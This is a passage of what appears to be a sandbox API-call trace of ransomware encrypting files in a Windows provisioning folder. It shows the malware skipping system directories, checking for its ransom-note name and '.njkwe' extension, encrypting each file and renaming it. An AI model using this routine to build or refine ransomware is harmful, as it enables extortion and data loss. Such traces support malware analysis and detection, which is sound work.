ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x34d, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="479__Connections_Cellular_Vodafone UK (United Kingdom)_i1$(__MVID)@WAP.provxml", cAlternateFileName="479__C~1.PRO")) returned 1 [0081.074] lstrcmpiW (lpString1="479__Connections_Cellular_Vodafone UK (United Kingdom)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.074] lstrcmpiW (lpString1="479__Connections_Cellular_Vodafone UK (United Kingdom)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.074] lstrcmpiW (lpString1="479__Connections_Cellular_Vodafone UK (United Kingdom)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.074] lstrcmpiW (lpString1="479__Connections_Cellular_Vodafone UK (United Kingdom)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.074] lstrcmpiW (lpString1="479__Connections_Cellular_Vodafone UK (United Kingdom)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.074] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\479__Connections_Cellular_Vodafone UK (United Kingdom)_i1$(__MVID)@WAP.provxml") returned 172 [0081.074] StrStrIW (lpFirst="479__Connections_Cellular_Vodafone UK (United Kingdom)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.074] lstrcmpW (lpString1="479__Connections_Cellular_Vodafone UK (United Kingdom)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.074] lstrcmpW (lpString1="479__Connections_Cellular_Vodafone UK (United Kingdom)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.074] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\479__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.074] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\479__Connections_Cellular_Vodafone UK (United Kingdom)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\479__connections_cellular_vodafone uk (united kingdom)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.075] GetTickCount () returned 0x115494a [0081.075] GetTickCount () returned 0x115494a [0081.075] GetTickCount () returned 0x115494a [0081.075] GetTickCount () returned 0x115494a [0081.075] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.075] GetProcessHeap () returned 0xbe0000 [0081.075] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0081.075] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x34d, lpOverlapped=0x0) returned 1 [0081.076] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcb3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.076] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x34d, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x34d, lpOverlapped=0x0) returned 1 [0081.076] GetProcessHeap () returned 0xbe0000 [0081.076] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0081.076] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.076] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.077] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.077] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.077] CloseHandle (hObject=0x43c) returned 1 [0081.077] GetProcessHeap () returned 0xbe0000 [0081.077] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.077] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\479__Connections_Cellular_Vodafone UK (United Kingdom)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 192 [0081.077] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\479__Connections_Cellular_Vodafone UK (United Kingdom)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\479__connections_cellular_vodafone uk (united kingdom)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\479__Connections_Cellular_Vodafone UK (United Kingdom)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\479__connections_cellular_vodafone uk (united kingdom)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.078] GetProcessHeap () returned 0xbe0000 [0081.078] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.078] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9026e179, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9026e179, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9026e179, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cc, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="47__Connections_Cellular_ORANGE (Belgium)_i2$(__MVID)@WAP.provxml", cAlternateFileName="47__CO~1.PRO")) returned 1 [0081.078] lstrcmpiW (lpString1="47__Connections_Cellular_ORANGE (Belgium)_i2$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.078] lstrcmpiW (lpString1="47__Connections_Cellular_ORANGE (Belgium)_i2$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.078] lstrcmpiW (lpString1="47__Connections_Cellular_ORANGE (Belgium)_i2$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.078] lstrcmpiW (lpString1="47__Connections_Cellular_ORANGE (Belgium)_i2$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.078] lstrcmpiW (lpString1="47__Connections_Cellular_ORANGE (Belgium)_i2$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.078] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\47__Connections_Cellular_ORANGE (Belgium)_i2$(__MVID)@WAP.provxml") returned 159 [0081.078] StrStrIW (lpFirst="47__Connections_Cellular_ORANGE (Belgium)_i2$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.078] lstrcmpW (lpString1="47__Connections_Cellular_ORANGE (Belgium)_i2$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.078] lstrcmpW (lpString1="47__Connections_Cellular_ORANGE (Belgium)_i2$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.078] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\47__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.078] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\47__Connections_Cellular_ORANGE (Belgium)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\47__connections_cellular_orange (belgium)_i2$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.078] GetTickCount () returned 0x115494a [0081.078] GetTickCount () returned 0x115494a [0081.078] GetTickCount () returned 0x115494a [0081.078] GetTickCount () returned 0x115494a [0081.079] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.080] GetProcessHeap () returned 0xbe0000 [0081.080] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0081.080] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2cc, lpOverlapped=0x0) returned 1 [0081.082] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.082] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2cc, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2cc, lpOverlapped=0x0) returned 1 [0081.082] GetProcessHeap () returned 0xbe0000 [0081.082] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0081.082] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.082] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.083] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.083] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.083] CloseHandle (hObject=0x43c) returned 1 [0081.083] GetProcessHeap () returned 0xbe0000 [0081.083] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.083] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\47__Connections_Cellular_ORANGE (Belgium)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0081.083] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\47__Connections_Cellular_ORANGE (Belgium)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\47__connections_cellular_orange (belgium)_i2$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\47__Connections_Cellular_ORANGE (Belgium)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\47__connections_cellular_orange (belgium)_i2$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.084] GetProcessHeap () returned 0xbe0000 [0081.084] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.084] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9115537f, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9115537f, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9115537f, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x359, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="480__Connections_Cellular_Vodafone UK (United Kingdom)_i2$(__MVID)@WAP.provxml", cAlternateFileName="480__C~1.PRO")) returned 1 [0081.084] lstrcmpiW (lpString1="480__Connections_Cellular_Vodafone UK (United Kingdom)_i2$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.084] lstrcmpiW (lpString1="480__Connections_Cellular_Vodafone UK (United Kingdom)_i2$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.084] lstrcmpiW (lpString1="480__Connections_Cellular_Vodafone UK (United Kingdom)_i2$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.084] lstrcmpiW (lpString1="480__Connections_Cellular_Vodafone UK (United Kingdom)_i2$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.084] lstrcmpiW (lpString1="480__Connections_Cellular_Vodafone UK (United Kingdom)_i2$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.084] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\480__Connections_Cellular_Vodafone UK (United Kingdom)_i2$(__MVID)@WAP.provxml") returned 172 [0081.084] StrStrIW (lpFirst="480__Connections_Cellular_Vodafone UK (United Kingdom)_i2$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.084] lstrcmpW (lpString1="480__Connections_Cellular_Vodafone UK (United Kingdom)_i2$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.084] lstrcmpW (lpString1="480__Connections_Cellular_Vodafone UK (United Kingdom)_i2$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.084] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\480__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.084] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\480__Connections_Cellular_Vodafone UK (United Kingdom)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\480__connections_cellular_vodafone uk (united kingdom)_i2$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.084] GetTickCount () returned 0x115495a [0081.084] GetTickCount () returned 0x115495a [0081.084] GetTickCount () returned 0x115495a [0081.084] GetTickCount () returned 0x115495a [0081.084] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.084] GetProcessHeap () returned 0xbe0000 [0081.084] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0081.084] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x359, lpOverlapped=0x0) returned 1 [0081.086] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffca7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.086] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x359, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x359, lpOverlapped=0x0) returned 1 [0081.086] GetProcessHeap () returned 0xbe0000 [0081.086] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0081.086] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.086] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.086] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.086] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.087] CloseHandle (hObject=0x43c) returned 1 [0081.087] GetProcessHeap () returned 0xbe0000 [0081.087] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.087] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\480__Connections_Cellular_Vodafone UK (United Kingdom)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 192 [0081.087] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\480__Connections_Cellular_Vodafone UK (United Kingdom)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\480__connections_cellular_vodafone uk (united kingdom)_i2$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\480__Connections_Cellular_Vodafone UK (United Kingdom)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\480__connections_cellular_vodafone uk (united kingdom)_i2$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.087] GetProcessHeap () returned 0xbe0000 [0081.088] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.088] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9115537f, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9115537f, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9115537f, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x353, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="481__Connections_Cellular_Vodafone UK (United Kingdom)_i3$(__MVID)@WAP.provxml", cAlternateFileName="481__C~1.PRO")) returned 1 [0081.088] lstrcmpiW (lpString1="481__Connections_Cellular_Vodafone UK (United Kingdom)_i3$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.088] lstrcmpiW (lpString1="481__Connections_Cellular_Vodafone UK (United Kingdom)_i3$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.088] lstrcmpiW (lpString1="481__Connections_Cellular_Vodafone UK (United Kingdom)_i3$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.088] lstrcmpiW (lpString1="481__Connections_Cellular_Vodafone UK (United Kingdom)_i3$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.088] lstrcmpiW (lpString1="481__Connections_Cellular_Vodafone UK (United Kingdom)_i3$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.088] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\481__Connections_Cellular_Vodafone UK (United Kingdom)_i3$(__MVID)@WAP.provxml") returned 172 [0081.088] StrStrIW (lpFirst="481__Connections_Cellular_Vodafone UK (United Kingdom)_i3$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.088] lstrcmpW (lpString1="481__Connections_Cellular_Vodafone UK (United Kingdom)_i3$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.088] lstrcmpW (lpString1="481__Connections_Cellular_Vodafone UK (United Kingdom)_i3$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.088] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\481__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.088] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\481__Connections_Cellular_Vodafone UK (United Kingdom)_i3$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\481__connections_cellular_vodafone uk (united kingdom)_i3$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.088] GetTickCount () returned 0x115495a [0081.088] GetTickCount () returned 0x115495a [0081.088] GetTickCount () returned 0x115495a [0081.088] GetTickCount () returned 0x115495a [0081.088] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.088] GetProcessHeap () returned 0xbe0000 [0081.088] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0081.088] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x353, lpOverlapped=0x0) returned 1 [0081.090] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcad, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.090] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x353, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x353, lpOverlapped=0x0) returned 1 [0081.090] GetProcessHeap () returned 0xbe0000 [0081.090] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0081.090] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.090] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.090] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.090] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.091] CloseHandle (hObject=0x43c) returned 1 [0081.091] GetProcessHeap () returned 0xbe0000 [0081.091] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.091] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: 